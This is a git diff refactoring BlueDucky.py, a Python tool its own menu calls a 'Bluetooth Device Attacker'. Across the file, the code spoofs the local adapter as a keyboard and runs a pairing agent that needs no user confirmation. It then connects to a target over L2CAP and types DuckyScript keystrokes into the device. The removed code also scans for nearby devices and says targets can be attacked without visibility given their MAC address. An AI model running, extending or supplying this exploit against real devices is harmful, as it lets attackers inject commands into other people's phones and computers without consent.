diff --git a/BlueDucky.py b/BlueDucky.py index 383f9a0..b1e2886 100644 --- a/BlueDucky.py +++ b/BlueDucky.py @@ -1,292 +1,304 @@ -import bluetooth -import dbus -import dbus.service -import dbus.mainloop.glib -import logging as log -from multiprocessing import Process -from threading import Thread -import time import binascii -from gi.repository import GLib -from enum import Enum -import subprocess -from pydbus import SystemBus +import bluetooth +import logging as log import sys -import os -import re -import string +import time +from multiprocessing import Process +from pydbus import SystemBus +from enum import Enum + +from utils.menu_functions import (main_menu, read_duckyscript, + run, restart_bluetooth_daemon, get_target_address) +from utils.register_device import register_hid_profile, agent_loop child_processes = [] -def print_blue_ascii_art(): - blue_color_code = "\033[34m" # ANSI escape code for blue text - reset_color_code = "\033[0m" # ANSI escape code to reset text color +class ConnectionFailureException(Exception): + pass - ascii_art = """ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⣄⣤⣤⣄⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣴⡶⠟⠛⠉⠉⠉⠉⠉⠉⠉⠉⠉⠙⠛⠷⢶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⢷⣤⡀⠀⠀⠀⠀⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣆⠀⠀⠀⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣧⠀⠀⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣠⣤⣤⣤⣤⣤⣄⣀⡀⠀⠀⢹⣧⠀⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣶⣿⣷⣶⠶⠛⠛⠛⠛⠳⢶⣦⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣯⠉⠉⠉⠉⠉⠛⣷⠀⠀⢿⡄⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⢀⣠⣿⣀⡀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⠀⢀⣀⣀⣤⣴⠟⠀⠀⠸⣧⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⣙⣿⣿⣿⣿⣿⣿⠶⠶⠶⠿⠛⠛⠛⠛⠛⠛⢷⣦⡀⠉⠙⠛⠛⠛⠛⠛⠛⠛⠋⠉⠁⠀⠀⠀⠀⠀⣿⠀⠀⠀ -⠀⢀⣠⣴⠶⠾⠛⠛⠛⠉⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡀⠀⠀ -⢠⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢗⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀ -⠈⢿⣦⣄⣀⣀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣄⣀⠀⠀⠀⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀ -⠀⠀⠈⠉⠛⠛⠛⢻⣟⠛⠛⠛⠛⠛⠋⠉⠉⠉⠉⠉⠉⠉⠉⠉⠻⠷⠀⢀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠛⠷⢶⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣴⠶⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⢹⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⡇⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣇⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣆⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠻⢶ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⡾⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣴⠟⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ -⢀⣤⣤⡀⢀⣤⣤⡀⠀⣤⠀⠀⢀⣤⣄⢀⣤⣤⡀⠀⠀⣤⠀⠀⣠⠀⢀⣄⠀⠀⣠⣤⡀⠀⠀⠀⡀⠀⣠⡀⣠⣤⣤⣠⡀⠀⣤⢀⣤⣤⡀⣤⣤⡀ -⢸⣯⣹⡗⣿⣿⡏⠀⣼⣿⣇⢰⡿⠉⠃⣿⣿⡍⠀⠀⠀⢿⣤⣦⣿⠀⣾⢿⡆⢾⣯⣝⡃⠀⠀⢰⣿⣆⣿⡧⣿⣽⡍⠘⣷⣸⡏⣾⣿⡯⢸⣯⣩⡿ -⢸⡟⠉⠀⢿⣶⣶⢰⡿⠟⢻⡾⢷⣴⡆⢿⣶⣶⠄⠀⠀⠸⡿⠻⡿⣼⡿⠟⢿⢤⣭⣿⠟⠀⠀⢸⡇⠻⣿⠃⣿⣼⣶⠀⢻⡟⠀⢿⣧⣶⠸⣿⠻⣧ -⠀⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⢀⡀⠀⠀⠀⠀⣀⠀⠀⠀⠀⣀⡀⠈⢀⣀⣀⠀⣁⣀⣀⢀⡀⠀⢀⣀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⠀⢠⣧⡀⣿⠀⠀⠀⣼⡿⢿⣄⣼⡟⢿⡿⠿⣿⠿⢻⣧⢠⡿⠿⣧⣀⣿⡄⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣧⣾⡟⣷⣿⠀⠀⠘⣿⣀⣸⡟⢹⡿⠟⠁⠀⣿⡀⢸⣏⢿⣇⣠⣿⢻⣏⢿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ -⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠁⠀⠙⠙⠁⠘⠋⠀⠀⠀⠈⠉⠉⠀⠘⠁⠀⠀⠀⠉⠁⠈⠁⠀⠉⠉⠁⠈⠋⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀""" +class Adapter: + def __init__(self, iface): + self.iface = iface + self.bus = SystemBus() + self.adapter = self._get_adapter(iface) + def _get_adapter(self, iface): + try: + return self.bus.get("org.bluez", f"/org/bluez/{iface}") + except KeyError: + log.error(f"Unable to find adapter '{iface}', aborting.") + raise ConnectionFailureException("Adapter not found") - print(blue_color_code + ascii_art + reset_color_code) + def _run_command(self, command): + result = run(command) + if result.returncode != 0: + raise ConnectionFailureException(f"Failed to execute command: {' '.join(command)}. Error: {result.stderr}") + def set_property(self, prop, value): + # Convert value to string if it's not + value_str = str(value) if not isinstance(value, str) else value + command = ["sudo", "hciconfig", self.iface, prop, value_str] + self._run_command(command) -def register_hid_profile(iface, addr): - dbus.mainloop.glib.DBusGMainLoop(set_as_default=True) - bus = dbus.SystemBus() - get_obj = lambda path, iface: dbus.Interface(bus.get_object("org.bluez", path), iface) - addr_str = addr.replace(":", "_") - path = "/org/bluez/%s/dev_%s" % (iface, addr_str) - manager = get_obj("/org/bluez", "org.bluez.ProfileManager1") - profile_path = "/test/profile" - profile = Profile(bus, profile_path) - hid_uuid = "00001124-0000-1000-8000-00805F9B34FB" - - # Hardcoded XML content - xml_content = """ - + # Verify if the property is set correctly + verify_command = ["hciconfig", self.iface, prop] + verification_result = run(verify_command) + if value_str not in verification_result.stdout: + log.error(f"Unable to set adapter {prop}, aborting. Output: {verification_result.stdout}") + raise ConnectionFailureException(f"Failed to set {prop}") - - - - + def power(self, powered): + self.adapter.Powered = powered - - - - - - + def reset(self): + self.power(False) + self.power(True) - - - + def enable_ssp(self): + try: + # Command to enable SSP - the actual command might differ + # This is a placeholder command and should be replaced with the actual one. + ssp_command = ["sudo", "hciconfig", self.iface, "sspmode", "1"] + ssp_result = run(ssp_command) + if ssp_result.returncode != 0: + log.error(f"Failed to enable SSP: {ssp_result.stderr}") + raise ConnectionFailureException("Failed to enable SSP") + except Exception as e: + log.error(f"Error enabling SSP: {e}") + raise - - - - - +class PairingAgent: + def __init__(self, iface, target_addr): + self.iface = iface + self.target_addr = target_addr + dev_name = "dev_%s" % target_addr.upper().replace(":", "_") + self.target_path = "/org/bluez/%s/%s" % (iface, dev_name) - - - - - - + def __enter__(self): + try: + log.debug("Starting agent process...") + self.agent = Process(target=agent_loop, args=(self.target_path,)) + self.agent.start() + time.sleep(0.25) + log.debug("Agent process started.") + return self + except Exception as e: + log.error(f"Error starting agent process: {e}") + raise - - - - - - + def __exit__(self, exc_type, exc_val, exc_tb): + try: + log.debug("Terminating agent process...") + self.agent.kill() + time.sleep(0.25) + log.debug("Agent process terminated.") + except Exception as e: + log.error(f"Error terminating agent process: {e}") + raise - - - - - - - - +class L2CAPClient: + def __init__(self, addr, port): + self.addr = addr + self.port = port + self.connected = False + self.sock = None - - - - - - - - - + def encode_combo_input(*args): + if not args: + return bytes([0xA1, 0x01] + [0] * 8) # Empty report for key release - - - - + # Filter out non-Key_Codes arguments and process + valid_args = [a for a in args if isinstance(a, Key_Codes)] - - - - - + # Properly sum the values of modifiers + modifiers = sum(a.value for a in valid_args if a in Key_Codes.MODIFIERS) - - - - - - - + keycodes = [a.value for a in valid_args if a not in Key_Codes.MODIFIERS] + keycodes += [0] * (6 - len(keycodes)) + return bytes([0xA1, 0x01, modifiers, 0x00] + keycodes) - - - - + def encode_keyboard_input(*args): + keycodes = [] + flags = 0 + for a in args: + if isinstance(a, Key_Codes): + keycodes.append(a.value) + elif isinstance(a, Modifier_Codes): + flags |= a.value + assert(len(keycodes) <= 7) + keycodes += [0] * (7 - len(keycodes)) + report = bytes([0xa1, 0x01, flags, 0x00] + keycodes) + return report - - - - + def close(self): + if self.connected: + self.sock.close() + self.connected = False + self.sock = None - - - - + def send(self, data): + if not self.connected: + log.error("[TX] Not connected") + return - - - - + log.debug(f"[TX-{self.port}] Attempting to send data: {binascii.hexlify(data).decode()}") + if self.attempt_send(data, 0.1): + log.debug(f"[TX-{self.port}] Data sent successfully") + else: + log.error(f"[TX-{self.port}] ERROR! Timed out sending data") - - - - + def attempt_send(self, data, timeout): + start = time.time() + while time.time() - start < timeout: + try: + self.sock.send(data) + return True + except bluetooth.btcommon.BluetoothError as ex: + if ex.errno != 11: # no data available + raise ex + time.sleep(0.001) + except Exception as ex: + log.error(f"[TX-{self.port}] Exception: {ex}") + self.connected = False + return False - - - - + def recv(self, timeout=0): + start = time.time() + while True: + raw = None + if not self.connected: + return None + if self.sock is None: + return None + try: + raw = self.sock.recv(64) + if len(raw) == 0: + self.connected = False + return None + log.debug(f"[RX-{self.port}] Received data: {binascii.hexlify(raw).decode()}") + except bluetooth.btcommon.BluetoothError as ex: + if ex.errno != 11: # no data available + raise ex + else: + if (time.time() - start) < timeout: + continue + return raw - - - - + def connect(self, timeout=None): + log.debug(f"Attempting to connect to {self.addr} on port {self.port}") + log.debug("connecting to %s on port %d" % (self.addr, self.port)) + sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) + sock.settimeout(timeout) + try: + sock.connect((self.addr, self.port)) + sock.setblocking(0) + self.sock = sock + self.connected = True + log.debug("SUCCESS! connected on port %d" % self.port) + except Exception as ex: + self.connected = False + log.error("ERROR connecting on port %d: %s" % (self.port, ex)) + raise ConnectionFailureException(f"Connection failure on port {self.port}") - - - - + return self.connected - - - - + def send_keyboard_report(self, *args): + self.send(self.encode_keyboard_input(*args)) - - - - - - - - - + def send_keypress(self, *args, delay=0.05): + if args: + log.debug(f"Attempting to send... {args}") + self.send(self.encode_keyboard_input(*args)) + else: + # If no arguments, send an empty report to release keys + self.send(self.encode_keyboard_input()) + time.sleep(delay) - - - - - - - - - + def send_combination(self, *keys, delay=0.05): + """ + Send a combination of keys, which can include modifiers and regular keys. + """ + modifiers = 0 + regular_keys = [] - - - - + for key in keys: + if key in Key_Codes.MODIFIERS: + modifiers |= key.value + else: + regular_keys.append(key.value) - - - - + # Ensure that no more than 6 regular keys are sent + regular_keys = regular_keys[:6] + [0] * (6 - len(regular_keys)) - - - - + # Create the HID report and send it + report = bytes([0xa1, 0x01, modifiers, 0x00] + regular_keys) + self.send(report) + time.sleep(delay) - - - - + # Send an empty report to release the keys + self.send(self.encode_combo_input()) - - - - +class L2CAPConnectionManager: + def __init__(self, target_address): + self.target_address = target_address + self.clients = {} - - - - -""" + def create_connection(self, port): + client = L2CAPClient(self.target_address, port) + self.clients[port] = client + return client - opts = {"ServiceRecord": xml_content} - log.debug("calling RegisterProfile") - manager.RegisterProfile(profile, hid_uuid, opts) - loop = GLib.MainLoop() - try: - log.debug("running dbus loop") - loop.run() - except KeyboardInterrupt: - log.debug("calling UnregisterProfile") - manager.UnregisterProfile(profile) + def connect_all(self): + try: + return sum(client.connect() for client in self.clients.values()) + except ConnectionFailureException as e: + log.error(f"Connection failure: {e}") + raise -class Profile(dbus.service.Object): - @dbus.service.method("org.bluez.Profile1", in_signature="", out_signature="") - def Cancel(self): - print("Profile.Cancel") + def close_all(self): + for client in self.clients.values(): + client.close() + +def terminate_child_processes(): + for proc in child_processes: + if proc.is_alive(): + proc.terminate() + proc.join() + +def setup_bluetooth(target_address): + restart_bluetooth_daemon() + profile_proc = Process(target=register_hid_profile, args=('hci0', target_address)) + profile_proc.start() + child_processes.append(profile_proc) + adapter = Adapter('hci0') + adapter.set_property("name", "Robot POC") + adapter.set_property("class", 0x002540) + adapter.power(True) + return adapter + +# Key codes for modifier keys +class Modifier_Codes(Enum): + LEFTCONTROL = 0xe0 + LEFTSHIFT = 0xe1 + LEFTALT = 0xe2 + LEFTGUI = 0xe3 + RIGHTCONTROL = 0xe4 + RIGHTSHIFT = 0xe5 + RIGHTALT = 0xe6 + RIGHTGUI = 0xe7 + + # Convenience mappings for common names + CTRL = LEFTCONTROL + ALT = LEFTALT + SHIFT = LEFTSHIFT + GUI = LEFTGUI + +# Modifier Key Set for easy checking +MODIFIER_KEYS_SET = {Modifier_Codes.LEFTCONTROL, Modifier_Codes.LEFTSHIFT, Modifier_Codes.LEFTALT, Modifier_Codes.LEFTGUI, + Modifier_Codes.RIGHTCONTROL, Modifier_Codes.RIGHTSHIFT, Modifier_Codes.RIGHTALT, Modifier_Codes.RIGHTGUI} class Key_Codes(Enum): NONE = 0x00 - a = 0x04 - b = 0x05 - c = 0x06 - d = 0x07 - e = 0x08 - f = 0x09 - g = 0x0a - h = 0x0b - i = 0x0c - j = 0x0d - k = 0x0e - l = 0x0f - m = 0x10 - n = 0x11 - o = 0x12 - p = 0x13 - q = 0x14 - r = 0x15 - s = 0x16 - t = 0x17 - u = 0x18 - v = 0x19 - w = 0x1a - x = 0x1b - y = 0x1c - z = 0x1d A = 0x04 B = 0x05 C = 0x06 @@ -340,499 +352,85 @@ class Key_Codes(Enum): DOT = 0x37 SLASH = 0x38 CAPSLOCK = 0x39 - F1 = 0x3a - F2 = 0x3b - F3 = 0x3c - F4 = 0x3d - F5 = 0x3e - F6 = 0x3f - F7 = 0x40 - F8 = 0x41 - F9 = 0x42 - F10 = 0x43 - F11 = 0x44 - F12 = 0x45 - PRINTSCREEN = 0x46 - SCROLLLOCK = 0x47 - PAUSE = 0x48 - INSERT = 0x49 - HOME = 0x4a - PAGEUP = 0x4b - DELETE = 0x4c - END = 0x4d - PAGEDOWN = 0x4e - RIGHT = 0x4f - LEFT = 0x50 - DOWN = 0x51 - UP = 0x52 - NUMLOCK = 0x53 - KEYPADSLASH = 0x54 - KEYPADASTERISK = 0x55 - KEYPADMINUS = 0x56 - KEYPADPLUS = 0x57 - KEYPADENTER = 0x58 - KEYPAD1 = 0x59 - KEYPAD2 = 0x5a - KEYPAD3 = 0x5b - KEYPAD4 = 0x5c - KEYPAD5 = 0x5d - KEYPAD6 = 0x5e - KEYPAD7 = 0x5f - KEYPAD8 = 0x60 - KEYPAD9 = 0x61 - KEYPAD0 = 0x62 - KEYPADDELETE = 0x63 - KEYPADCOMPOSE = 0x65 - KEYPADPOWER = 0x66 - KEYPADEQUAL = 0x67 - F13 = 0x68 - F14 = 0x69 - F15 = 0x6a - F16 = 0x6b - F17 = 0x6c - F18 = 0x6d - F19 = 0x6e - F20 = 0x6f - F21 = 0x70 - F22 = 0x71 - F23 = 0x72 - F24 = 0x73 - OPEN = 0x74 - HELP = 0x75 - PROPS = 0x76 - FRONT = 0x77 - STOP = 0x78 - AGAIN = 0x79 - UNDO = 0x7a - CUT = 0x7b - COPY = 0x7c - PASTE = 0x7d - FIND = 0x7e - MUTE = 0x7f - VOLUMEUP = 0x80 - VOLUMEDOWN = 0x81 - LEFTCONTROL = 0xe0 - LEFTSHIFT = 0xe1 - LEFTALT = 0xe2 - LEFTMETA = 0xe3 - RIGHTCONTROL = 0xe4 - RIGHTSHIFT = 0xe5 - RIGHTALT = 0xe6 - RIGHTMETA = 0xe7 - MEDIAPLAYPAUSE = 0xe8 - MEDIASTOPCD = 0xe9 - MEDIAPREV = 0xea - MEDIANEXT = 0xeb - MEDIAEJECTCD = 0xec - MEDIAVOLUMEUP = 0xed - MEDIAVOLUMEDOWN = 0xee - MEDIAMUTE = 0xef - MEDIAWEBBROWSER = 0xf0 - MEDIABACK = 0xf1 - MEDIAFORWARD = 0xf2 - MEDIASTOP = 0xf3 - MEDIAFIND = 0xf4 - MEDIASCROLLUP = 0xf5 - MEDIASCROLLDOWN = 0xf6 - MEDIAEDIT = 0xf7 - MEDIASLEEP = 0xf8 - MEDIACOFFEE = 0xf9 - MEDIAREFRESH = 0xfa - MEDIACALC = 0xfb -class ConnectionFailureException(Exception): - pass - -class Adapter: - def __init__(self, iface): - self.iface = iface - self.bus = SystemBus() - try: - self.adapter = self.bus.get("org.bluez", "/org/bluez/%s" % iface) - except KeyError: - log.error("Unable to find adapter '%s', aborting." % iface) - sys.exit(1) - self.reset() - - def enable_ssp(self): - run(["sudo", "btmgmt", "--index", self.iface, "io-cap", "1"]) - run(["sudo", "btmgmt", "--index", self.iface, "ssp", "1"]) - - def disable_ssp(self): - run(["sudo", "btmgmt", "--index", self.iface, "ssp", "0"]) - - def set_name(self, name): - if self.adapter.Name != name: - run(["sudo", "hciconfig", self.iface, "name", name]) - if name not in run(["hciconfig", self.iface, "name"]).decode(): - log.error("Unable to set adapter name, aborting.") - sys.exit(1) - - def set_class(self, adapter_class): - class_hex = "0x%06x" % adapter_class - if self.adapter.Class != class_hex: - run(["sudo", "hciconfig", self.iface, "class", class_hex]) - if class_hex not in run(["hciconfig", self.iface, "class"]).decode(): - log.error("Unable to set adapter class, aborting.") - sys.exit(1) - - def set_address(self, address): - run(["sudo", "bdaddr", "-i", self.iface, address]) - self.reset() - if address.upper() not in run(["hciconfig", self.iface]).decode(): - log.error("Unable to set adapter address, aborting.") - sys.exit(1) - - def down(self): - self.adapter.Powered = False - - def up(self): - self.adapter.Powered = True - - def reset(self): - self.down() - self.up() - -class Agent(dbus.service.Object): - @dbus.service.method("org.bluez.Agent1", in_signature="", out_signature="") - def Cancel(self): - log.debug("Agent.Cancel") - -class PairingAgent: - def __init__(self, iface, target_addr): - self.iface = iface - self.target_addr = target_addr - dev_name = "dev_%s" % target_addr.upper().replace(":", "_") - self.target_path = "/org/bluez/%s/%s" % (iface, dev_name) - - def __enter__(self): - self.agent = Process(target=agent_loop, args=(self.target_path,)) - self.agent.start() - time.sleep(0.25) - - def __exit__(self, a, b, c): - self.agent.kill() - time.sleep(0.25) - -class L2CAPClient: - def __init__(self, addr, port): - self.addr = addr - self.port = port - self.connected = False - self.sock = None - - def encode_keyboard_input(*args): - keycodes = [] - modifiers = 0 - for a in args: - if isinstance(a, Key_Codes): - if a in [Key_Codes.LEFTSHIFT, Key_Codes.RIGHTSHIFT, - Key_Codes.LEFTCONTROL, Key_Codes.RIGHTCONTROL, - Key_Codes.LEFTALT, Key_Codes.RIGHTALT, - Key_Codes.LEFTMETA, Key_Codes.RIGHTMETA]: - # Set the bit for the modifier - modifiers |= a.value - else: - keycodes.append(a.value) - assert(len(keycodes) <= 6) - keycodes += [0] * (6 - len(keycodes)) - report = bytes([0xa1, 0x01, modifiers, 0x00] + keycodes) - log.debug(f"{report}") - return report - - def close(self): - if self.connected: - self.sock.close() - self.connected = False - self.sock = None - - def send(self, data): - log.debug(f"[TX-{self.port}] Attempting to send data: {binascii.hexlify(data).decode()}") - timeout = 0.1 - start = time.time() - while (time.time() - start) < timeout: - try: - self.sock.send(data) - log.debug(f"[TX-{self.port}] Data sent successfully") - return - except bluetooth.btcommon.BluetoothError as ex: - log.error(f"[TX-{self.port}] BluetoothError: {ex}") - if ex.errno != 11: # no data available - raise ex - time.sleep(0.001) - except Exception as ex: - log.error(f"[TX-{self.port}] Exception: {ex}") - self.connected = False - log.error(f"[TX-{self.port}] ERROR! Timed out sending data") - - def recv(self, timeout=0): - start = time.time() - while True: - raw = None - if not self.connected: - return None - if self.sock is None: - return None - try: - raw = self.sock.recv(64) - if len(raw) == 0: - self.connected = False - return None - log.debug(f"[RX-{self.port}] Received data: {binascii.hexlify(raw).decode()}") - except bluetooth.btcommon.BluetoothError as ex: - if ex.errno != 11: # no data available - raise ex - else: - if (time.time() - start) < timeout: - continue - return raw - - def connect(self, timeout=None): - log.debug(f"Attempting to connect to {self.addr} on port {self.port}") - log.debug("connecting to %s on port %d" % (self.addr, self.port)) - sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) - sock.settimeout(timeout) - try: - sock.connect((self.addr, self.port)) - sock.setblocking(0) - self.sock = sock - self.connected = True - log.debug("SUCCESS! connected on port %d" % self.port) - except Exception as ex: - self.connected = False - log.error("ERROR connecting on port %d: %s" % (self.port, ex)) - raise ConnectionFailureException(f"Connection failure on port {self.port}") - - return self.connected - - def send_keyboard_report(self, *args): - self.send(self.encode_keyboard_input(*args)) - - def send_keypress(self, *args, delay=0.05): - self.send_keyboard_report(*args) - time.sleep(0.05) - self.send_keyboard_report() - time.sleep(0.05) - -class L2CAPConnectionManager: - def __init__(self, target_address): - self.target_address = target_address - self.clients = {} - - def create_connection(self, port): - client = L2CAPClient(self.target_address, port) - self.clients[port] = client - return client - - def connect_all(self): - success_count = 0 - for port, client in self.clients.items(): - if client.connect(): - success_count += 1 - else: - log.debug(f"Failed to connect on port {port}") - return success_count - - def close_all(self): - for client in self.clients.values(): - client.close() - -def run(command): - assert(isinstance(command, list)) - log.debug("executing '%s'" % " ".join(command)) - return subprocess.check_output(command, stderr=subprocess.PIPE) - -def restart_bluetooth_daemon(): - run(["sudo", "service", "bluetooth", "restart"]) +def process_duckyscript(client, duckyscript): + client.send_keypress('') # Send empty report time.sleep(0.5) -def clear_screen(): - os.system('clear') + for line in duckyscript: + line = line.strip() + if not line or line.startswith("REM"): + continue # Skip empty lines and comments -def agent_loop(target_path): - dbus.mainloop.glib.DBusGMainLoop(set_as_default=True) - loop = GLib.MainLoop() - bus = dbus.SystemBus() - path = "/test/agent" - agent = Agent(bus, path) - agent.target_path = target_path - obj = bus.get_object("org.bluez", "/org/bluez") - manager = dbus.Interface(obj, "org.bluez.AgentManager1") - manager.RegisterAgent(path, "NoInputNoOutput") - manager.RequestDefaultAgent(path) - log.debug("'NoInputNoOutput' pairing-agent is running") - loop.run() + if line.startswith("STRING"): + text = line[7:] + for letter in text: + try: + # Use upper() to match the uppercase keys defined in Key_Codes + key_code = getattr(Key_Codes, letter.upper()) if letter != " " else Key_Codes.SPACE + client.send_keypress(key_code) + client.send_keypress() + time.sleep(0.05) # Add a small delay between keypresses + except AttributeError: + log.warning(f"Unsupported character '{letter}' in Duckyscript") -# Function to load known devices from a file -def load_known_devices(filename='known_devices.txt'): - if os.path.exists(filename): - with open(filename, 'r') as file: - return [tuple(line.strip().split(',')) for line in file] - else: - return [] + elif line.startswith("GUI"): + # Handle combination keys + components = line.split() + try: + # Use Modifier_Codes for modifier keys + modifier = getattr(Modifier_Codes, components[0].upper()) + for key in components[1:]: + # Use Key_Codes for regular keys + key_code = getattr(Key_Codes, key.upper(), None) + if key_code: + client.send_combination(modifier, key_code) + client.send_combination() # Release keys + except AttributeError: + log.warning(f"Unsupported key or modifier in line: {line}") -# Function to save discovered devices to a file -def save_devices_to_file(devices, filename='known_devices.txt'): - with open(filename, 'w') as file: - for addr, name in devices: - file.write(f"{addr},{name}\n") +def initialize_pairing(agent_iface, target_address): + try: + with PairingAgent(agent_iface, target_address) as agent: + log.debug("Pairing agent initialized") + except Exception as e: + log.error(f"Failed to initialize pairing agent: {e}") + raise ConnectionFailureException("Pairing agent initialization failed") -# Function to scan for devices -def scan_for_devices(): - main_menu() - - # Load known devices - known_devices = load_known_devices() - if known_devices: - print("\nKnown devices:") - for idx, (addr, name) in enumerate(known_devices): - print(f"{idx + 1}: Device Name: {name}, Address: {addr}") - - use_known_device = input("\nDo you want to use one of these known devices? (yes/no): ") - if use_known_device.lower() == 'yes': - device_choice = int(input("Enter the number of the device: ")) - return [known_devices[device_choice - 1]] - - # Normal Bluetooth scan - print("\nAttempting to scan now...") - nearby_devices = bluetooth.discover_devices(duration=8, lookup_names=True, flush_cache=True, lookup_class=True) - device_list = [] - - if len(nearby_devices) == 0: - print("\nNo nearby devices found.") - else: - print("\nFound {} nearby device(s):".format(len(nearby_devices))) - for idx, (addr, name, _) in enumerate(nearby_devices): - print(f"{idx + 1}: Device Name: {name}, Address: {addr}") - device_list.append((addr, name)) - - # Save the scanned devices only if they are not already in known devices - new_devices = [device for device in device_list if device not in known_devices] - if new_devices: - known_devices += new_devices - save_devices_to_file(known_devices) - return device_list - -def terminate_child_processes(): - for proc in child_processes: - if proc.is_alive(): - proc.terminate() - proc.join() - -def main_menu(): - clear_screen() - print_blue_ascii_art() - title = "BlueDucky - Bluetooth Device Attacker" - separator = 70 * "=" - print(separator) - print(f"{separator}\n{title.center(len(separator))}\n{separator}") - print("Remember, you can still attack devices without visibility...\nIf you have their MAC address") - print(separator) - -def is_valid_mac_address(mac_address): - # Regular expression to match a MAC address in the form 